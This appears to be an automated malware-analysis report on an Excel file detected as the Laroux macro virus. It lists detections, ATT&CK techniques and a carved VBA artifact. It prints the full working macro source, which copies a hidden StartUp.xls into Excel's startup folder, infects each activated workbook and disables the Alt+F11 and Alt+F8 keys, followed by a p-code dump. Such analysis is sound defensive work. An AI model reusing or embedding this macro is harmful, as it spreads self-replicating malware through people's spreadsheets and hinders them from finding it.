MALICIOUS
88
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
The sample is an Excel document containing VBA macros. The 'auto_open' macro attempts to copy itself to the Excel startup path as 'StartUp.xls' and registers a macro ('cop') to be executed when a sheet is activated. This indicates an attempt to establish persistence. The ClamAV detection 'Doc.Macro.Laroux-5893719-0' further supports its malicious nature.
Heuristics 3
-
ClamAV: Doc.Macro.Laroux-5893719-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.Laroux-5893719-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Sub auto_open()
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4375 bytes |
SHA-256: 7becd64b7e662002ddf9bee153fe1b0a94f0320a313b4687f5cde7dad51afc25 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "StartUp"
Sub auto_open()
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
On Error Resume Next
If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "StartUp.xls") = "" Then
Application.ScreenUpdating = False
ThisWorkbook.Sheets("StartUp").Copy
ActiveWorkbook.SaveAs (Application.StartupPath & "\" & "StartUp.xls")
n$ = ActiveWorkbook.Name
ActiveWindow.Visible = False
Workbooks("StartUp.xls").Save
Workbooks(n$).Close (False)
End If
Application.OnSheetActivate = "StartUp.xls!cop"
Application.OnKey "%{F11}", "StartUp.xls!escape"
Application.OnKey "%{F8}", "StartUp.xls!escape"
End Sub
Sub cop()
Attribute cop.VB_ProcData.VB_Invoke_Func = " \n14"
On Error Resume Next
If ActiveWorkbook.Sheets(1).Name <> "StartUp" Then
Application.ScreenUpdating = False
n$ = ActiveSheet.Name
Workbooks("StartUp.xls").Sheets("StartUp").Copy before:=Worksheets(1)
Sheets(n$).Select
End If
End Sub
Sub back()
Attribute back.VB_ProcData.VB_Invoke_Func = " \n14"
On Error Resume Next
Application.OnKey "%{F8}", "StartUp.xls!escape"
Application.OnKey "%{F11}", "StartUp.xls!escape"
Application.OnSheetActivate = "StartUp.xls!cop"
Application.OnTime Now + TimeValue("00:00:01"), "StartUp.xls!cop"
Workbooks.Open Application.StartupPath & "\StartUp.xls"
End Sub
' Processing file: /opt/analyzer/scan_staging/d5e8dddd939b41119bc0471911d92b2e.bin
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/StartUp - 2802 bytes
' Line #0:
' FuncDefn (Sub StartupPath())
' Line #1:
' OnError (Resume Next)
' Line #2:
' Ld ScreenUpdating
' MemLd Sheets
' Ld Copy
' MemLd ActiveWorkbook
' Ne
' Ld Copy
' MemLd ActiveWorkbook
' LitStr 0x0001 "\"
' Concat
' LitStr 0x000B "StartUp.xls"
' Concat
' ArgsLd Dir 0x0001
' LitStr 0x0000 ""
' Eq
' And
' IfBlock
' Line #3:
' LitVarSpecial (False)
' Ld Copy
' MemSt SaveAs
' Line #4:
' LitStr 0x0007 "StartUp"
' Ld ScreenUpdating
' ArgsMemLd n 0x0001
' ArgsMemCall ActiveWindow 0x0000
' Line #5:
' Ld Copy
' MemLd ActiveWorkbook
' LitStr 0x0001 "\"
' Concat
' LitStr 0x000B "StartUp.xls"
' Concat
' Paren
' Ld Visible
' ArgsMemCall Workbooks 0x0001
' Line #6:
' Ld Visible
' MemLd Name
' St Save$
' Line #7:
' LitVarSpecial (False)
' Ld OnSheetActivate
' MemSt OnKey
' Line #8:
' LitStr 0x000B "StartUp.xls"
' ArgsLd cop 0x0001
' ArgsMemCall ActiveSheet 0x0000
' Line #9:
' LitVarSpecial (False)
' Paren
' Ld Save$
' ArgsLd cop 0x0001
' ArgsMemCall Close 0x0001
' Line #10:
' EndIfBlock
' Line #11:
' LitStr 0x000F "StartUp.xls!cop"
' Ld Copy
' MemSt before
' Line #12:
' LitStr 0x0006 "%{F11}"
' LitStr 0x0012 "StartUp.xls!escape"
' Ld Copy
' ArgsMemCall Worksheets 0x0002
' Line #13:
' LitStr 0x0005 "%{F8}"
' LitStr 0x0012 "StartUp.xls!escape"
' Ld Copy
' ArgsMemCall Worksheets 0x0002
' Line #14:
' EndSub
' Line #15:
' FuncDefn (Sub back())
' Line #16:
' OnError (Resume Next)
' Line #17:
' LitDI2 0x0001
' Ld Visible
' ArgsMemLd n 0x0001
' MemLd Name
' LitStr 0x0007 "StartUp"
' Ne
' IfBlock
' Line #18:
' LitVarSpecial (False)
' Ld Copy
' MemSt SaveAs
' Line #19:
' Ld OnTime
' MemLd Name
' St Save$
' Line #20:
' LitDI2 0x0001
' ArgsLd TimeValue 0x0001
' ParamNamed Now
' LitStr 0x0007 "StartUp"
' LitStr 0x000B "StartUp.xls"
' ArgsLd cop 0x0001
' ArgsMemLd n 0x0001
' ArgsMemCall ActiveWindow 0x0001
' Line #21:
' Ld Save$
' ArgsLd n 0x0001
' ArgsMemCall Select 0x0000
' Line #22:
' EndIfBlock
' Line #23:
' EndSub
' Line #24:
' FuncDefn (Sub id_0250())
' Line #25:
' OnError (Resume Next)
' Line #26:
' LitStr 0x0005 "%{F8}"
' LitStr 0x0012 "StartUp.xls!escape"
' Ld Copy
' ArgsMemCall Worksheets 0x0002
' Line #27:
' LitStr 0x0006 "%{F11}"
' LitStr 0x0012 "StartUp.xls!escape"
' Ld Copy
' ArgsMemCall Worksheets 0x0002
' Line #28:
' LitStr 0x000F "StartUp.xls!cop"
' Ld Copy
' MemSt before
' Line #29:
' Ld id_0254
' LitStr 0x0008 "00:00:01"
' ArgsLd id_0256 0x0001
' Add
' LitStr 0x000F "StartUp.xls!cop"
' Ld Copy
' ArgsMemCall id_0252 0x0002
' Line #30:
' Ld Copy
' MemLd ActiveWorkbook
' LitStr 0x000C "\StartUp.xls"
' Concat
' Ld cop
' ArgsMemCall Open 0x0001
' Line #31:
' EndSub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.